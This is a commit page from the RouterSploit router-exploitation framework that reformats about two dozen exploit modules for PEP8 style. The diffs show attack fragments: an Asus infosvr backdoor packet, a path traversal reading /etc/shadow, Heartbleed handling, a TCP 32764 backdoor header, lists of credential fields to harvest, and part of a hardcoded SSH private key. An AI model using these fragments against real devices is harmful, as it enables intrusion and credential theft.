Skip to content

R
routersploit
Commit 350f1212 by fwkz
Options

Fixing PEP8 violations.

parent 73e8b5cd
Showing with 62 additions and 37 deletions
routersploit/modules/exploits/3com/3cradsl72_info_disclosure.py
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com 3CRADSL72 Info Disclosure',
'description': 'Exploits 3Com 3CRADSL72 information disclosure vulnerability that allows to fetch credentials for SQL sa account',
'description': 'Exploits 3Com 3CRADSL72 information disclosure vulnerability '
'that allows to fetch credentials for SQL sa account',
'authors': [
'Karb0nOxyde <karb0noxyde[at]gmail.com>', # vulnerability discovery
'Ivan Casado Ruiz <casadoi[at]yahoo.co.uk>', # vulnerability discovery
......
routersploit/modules/exploits/3com/imc_path_traversal.py
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com IMC Path Traversal',
'description': 'Exploits 3Com Intelligent Management Center path traversal vulnerability. If the target is vulnerable it is possible to read file from the filesystem.',
'description': 'Exploits 3Com Intelligent Management Center path traversal vulnerability. '
'If the target is vulnerable it is possible to read file from the filesystem.',
'authors': [
'Richard Brain', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -34,7 +35,6 @@ class Exploit(exploits.Exploit):
port = exploits.Option(8080, 'Target port') # default port
filename = exploits.Option('\\windows\\win.ini', 'File to read from the filesystem')
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
......
routersploit/modules/exploits/3com/officeconnect_info_disclosure.py
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com OfficeConnect Info Disclosure',
'description': 'Exploits 3Com OfficeConnect information disclosure vulnerability. If the target is vulnerable it is possible to read sensitive information.',
'description': 'Exploits 3Com OfficeConnect information disclosure vulnerability. '
'If the target is vulnerable it is possible to read sensitive information.',
'authors': [
'Luca Carettoni <luca.carettoni[at]ikkisoft.com>', # vulnerablity discovery
'iDefense', # vulnerability discovery
......
routersploit/modules/exploits/asus/infosvr_backdoor_rce.py
......@@ -70,7 +70,7 @@ class Exploit(exploits.Exploit):
sock.bind(('0.0.0.0', 9999))
sock.settimeout(2)
packet = (b'\x0C\x15\x33\x00'+ os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')
packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')
try:
sock.sendto(packet, (self.target, 9999))
......@@ -86,7 +86,7 @@ class Exploit(exploits.Exploit):
if len(data) == 512 and data[1] == "\x16":
break
length = struct.unpack('<H', data[14:16])[0]
output = data[16:16+length]
output = data[16:16 + length]
sock.close()
return output
......
routersploit/modules/exploits/belkin/g_plus_info_disclosure.py
......@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Belkin G Info Disclosure',
'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure vulnerability which allows fetching sensitive information such as credentials.',
'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure '
'vulnerability which allows fetching sensitive information such as credentials.',
'authors': [
'DarkFig', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -42,7 +43,8 @@ class Exploit(exploits.Exploit):
if response is None:
return
var = ['pppoe_username',
var = [
'pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
......@@ -50,7 +52,8 @@ class Exploit(exploits.Exploit):
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
'pppoe_passwd'
]
data = []
for v in var:
......@@ -76,7 +79,8 @@ class Exploit(exploits.Exploit):
if response is None:
return False # target is not vulnerable
var = ['pppoe_username',
var = [
'pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
......@@ -84,7 +88,8 @@ class Exploit(exploits.Exploit):
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
'pppoe_passwd'
]
if any(map(lambda x: x in response.text, var)):
return True # target vulnerable
......
routersploit/modules/exploits/cisco/dpc2420_info_disclosure.py
......@@ -58,4 +58,3 @@ class Exploit(exploits.Exploit):
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/cisco/ucm_info_disclosure.py
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Cisco UCM Info Disclosure',
'description': 'Module exploits information disclosure vulnerability in Cisco UCM devices. If the target is vulnerable it is possible to read sensitive information through TFTP service.',
'description': 'Module exploits information disclosure vulnerability in Cisco UCM devices. '
'If the target is vulnerable it is possible to read sensitive information through TFTP service.',
'authors': [
'Daniel Svartman <danielsvartman[at]gmail.com', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -72,4 +73,3 @@ class Exploit(exploits.Exploit):
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/cisco/ucs_manager_rce.py
......@@ -19,7 +19,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Cisco UCS Manager RCE',
'description': 'Module exploits Cisco UCS Manager 2.1 (1b) Remote Code Execution vulnerability which allows executing commands on operating system level.',
'description': 'Module exploits Cisco UCS Manager 2.1 (1b) Remote Code Execution vulnerability which '
'allows executing commands on operating system level.',
'authors': [
'thatchriseckert', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -84,4 +85,3 @@ class Exploit(exploits.Exploit):
return True
return False
routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py
......@@ -10,7 +10,7 @@ from routersploit import (
http_request,
mute,
validators,
)
)
class Exploit(exploits.Exploit):
......
routersploit/modules/exploits/dlink/dir_300_320_600_615_info_disclosure.py
......@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'D-Link DIR-300 & DIR-320 & DIR-600 & DIR-615 Info Disclosure',
'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600, DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600,'
'DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
'authors': [
'tytusromekiatomek <tytusromekiatomek[at]inbox.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......
routersploit/modules/exploits/dlink/dir_300_320_615_auth_bypass.py
......@@ -15,7 +15,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass',
'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 revD devices. It is possible to access administration panel without providing password.',
'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615'
'revD devices. It is possible to access administration panel without providing password.',
'authors': [
'Craig Heffner', # vulnerability discovery
'Karol Celin', # vulnerability discovery
......
routersploit/modules/exploits/dlink/dsl_2730b_2780b_526b_dns_change.py
......@@ -38,7 +38,6 @@ class Exploit(exploits.Exploit):
dns1 = exploits.Option('8.8.8.8', 'Primary DNS Server')
dns2 = exploits.Option('8.8.4.4', 'Seconary DNS Server')
def run(self):
url = "{}:{}/dnscfg.cgi?dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=".format(self.target,
self.port,
......
routersploit/modules/exploits/dlink/dvg_n5402sp_path_traversal.py
......@@ -66,7 +66,18 @@ class Exploit(exploits.Exploit):
def check(self):
# address and parameters
url = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../../etc/shadow", "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "blah", "%3Apassword": "blah","%3Aaction": "login","%3Asessionid": "abcdefgh"}
data = {
"getpage": "html/index.html",
"*errorpage*": "../../../../../../../../../../../etc/shadow",
"var%3Amenu": "setup",
"var%3Apage": "connected",
"var%": "",
"objaction": "auth",
"%3Ausername": "blah",
"%3Apassword": "blah",
"%3Aaction": "login",
"%3Asessionid": "abcdefgh"
}
# connection
response = http_request(method="POST", url=url, data=data)
......@@ -77,4 +88,3 @@ class Exploit(exploits.Exploit):
return True # target vulnerable
return False # target not vulnerable
routersploit/modules/exploits/huawei/hg520_info_dislosure.py
......@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Huawei HG520 Information Disclosure',
'description': 'Module exploits Huawei EchoLife HG520 information disclosure vulnerablity. If the target is vulnerable it is possible to retrieve sensitive information.',
'description': 'Module exploits Huawei EchoLife HG520 information disclosure vulnerablity.'
'If the target is vulnerable it is possible to retrieve sensitive information.',
'authors': [
'hkm', # vulnerablity discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......
routersploit/modules/exploits/ipfire/ipfire_shellshock.py
......@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'IPFire Shellshock',
'description': 'Exploits shellshock vulnerability in IPFire M= 2.15 Core Update 82. If the target is vulnerable it is possible to execute commands on operating system level.',
'description': 'Exploits shellshock vulnerability in IPFire M= 2.15 Core Update 82.'
'If the target is vulnerable it is possible to execute commands on operating system level.',
'authors': [
'Claudio Viviani', # vulnerability discovery
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
......
routersploit/modules/exploits/linksys/wap54gv3_rce.py
......@@ -19,7 +19,9 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Linksys WAP54Gv3',
'description': 'Module exploits remote command execution in Linksys WAP54Gv3 devices. Debug interface allows executing root privileged shell commands is available on dedicated web pages on the device.',
'description': 'Module exploits remote command execution in Linksys WAP54Gv3 devices.'
'Debug interface allows executing root privileged shell commands is available'
'on dedicated web pages on the device.',
'authors': [
'Phil Purviance', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......
routersploit/modules/exploits/multi/heartbleed.py
......@@ -66,9 +66,9 @@ class Exploit(exploits.Exploit):
def hexdump(self, s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
lin = [c for c in s[b: b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
......@@ -139,7 +139,7 @@ class Exploit(exploits.Exploit):
while True:
typ, ver, pay = self.recvmsg(s)
if typ == None:
if typ is None:
print_error("Server closed connection without sending Server Hello.")
print_error("Exploit failed")
return
......@@ -163,7 +163,7 @@ class Exploit(exploits.Exploit):
while True:
typ, ver, pay = self.recvmsg(s)
if typ == None:
if typ is None:
return False # target is not vulnerable
if typ == 22 and ord(pay[0]) == 0x0E:
......
routersploit/modules/exploits/multi/misfortune_cookie.py
......@@ -67,7 +67,7 @@ class Exploit(exploits.Exploit):
{'name': "TP-Link TD-8840T V2_100525", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # tested
{'name': "TP-Link TD-8840T V2_100702_TR", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8840T V2_090609", 'number': 107369570, 'offset': 1}, # 0x803c65d5 # ----------
{'name': "TP-Link TD-8840T V3_101208", 'number': 107369766, 'offset': 17}, #0x803c3e89 # tested
{'name': "TP-Link TD-8840T V3_101208", 'number': 107369766, 'offset': 17}, # 0x803c3e89 # tested
{'name': "TP-Link TD-8840T V3_110221", 'number': 107369764, 'offset': 5}, # 0x803d1a09 # ----------
{'name': "TP-Link TD-8840T V3_120531", 'number': 107369688, 'offset': 17}, # 0x803fed35 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367772, 'offset': 37}, # 0x803bf701 # ----------
......
routersploit/modules/exploits/multi/ssh_auth_keys.py
......@@ -147,7 +147,7 @@ class Exploit(exploits.Exploit):
"""
},
{ # loadbalancer.org enterprise va
"user":"root",
"user": "root",
"private_key": """
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW
......
routersploit/modules/exploits/multi/tcp_32764_info_disclosure.py
......@@ -85,7 +85,7 @@ class Exploit(exploits.Exploit):
print_error("Target is not vulnerable")
def execute(self, s, message, payload=""):
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload)+1)
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload) + 1)
s.send(header + payload + "\x00")
r = s.recv(0xC)
......
routersploit/modules/exploits/multi/tcp_32764_rce.py
......@@ -79,7 +79,7 @@ class Exploit(exploits.Exploit):
print self.execute(s, 7, cmd.strip("\n"))
def execute(self, s, message, payload=""):
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload)+1)
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload) + 1)
s.send(header + payload + "\x00")
r = s.recv(0xC)
......
routersploit/modules/exploits/netgear/prosafe_rce.py
......@@ -19,7 +19,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Netgear ProSafe RCE',
'description': 'Module exploits remote command execution vulnerability in Netgear ProSafe WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.',
'description': 'Module exploits remote command execution vulnerability in Netgear ProSafe'
'WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.',
'authors': [
'Andrei Costin <andrei[at]firmware.re>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......
routersploit/modules/exploits/tplink/wdr740nd_wdr740n_path_traversal.py
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'TP-Link WDR740ND & WDR740N Path Traversal',
'description': 'Exploits TP-Link WDR740ND and WDR740N path traversal vulnerability that allows to read files from the filesystem.',
'description': 'Exploits TP-Link WDR740ND and WDR740N path traversal vulnerability'
'that allowsto read files from the filesystem.',
'authors': [
'websec.ca', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......
routersploit/modules/exploits/zte/f609_config_disclosure.py
......@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'ZTE F609 Config Disclosure',
'description': 'Module exploits ZTE F609 Config Disclosure. If the target is possible to authentiate to the device.',
'description': 'Module exploits ZTE F609 Config Disclosure.'
'If the target is possible to authentiate to the device.',
'authors': [
'devilscream', # routersploit module
],
......
routersploit/modules/exploits/zte/f660_config_disclosure.py
......@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'ZTE F660 Config Disclosure',
'description': 'Module exploits ZTE F660 Config Disclosure. If the target is possible to authentiate to the device.',
'description': 'Module exploits ZTE F660 Config Disclosure.'
'If the target is possible to authentiate to the device.',
'authors': [
'devilscream', # vulnerability discovery & routersploit module
],
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment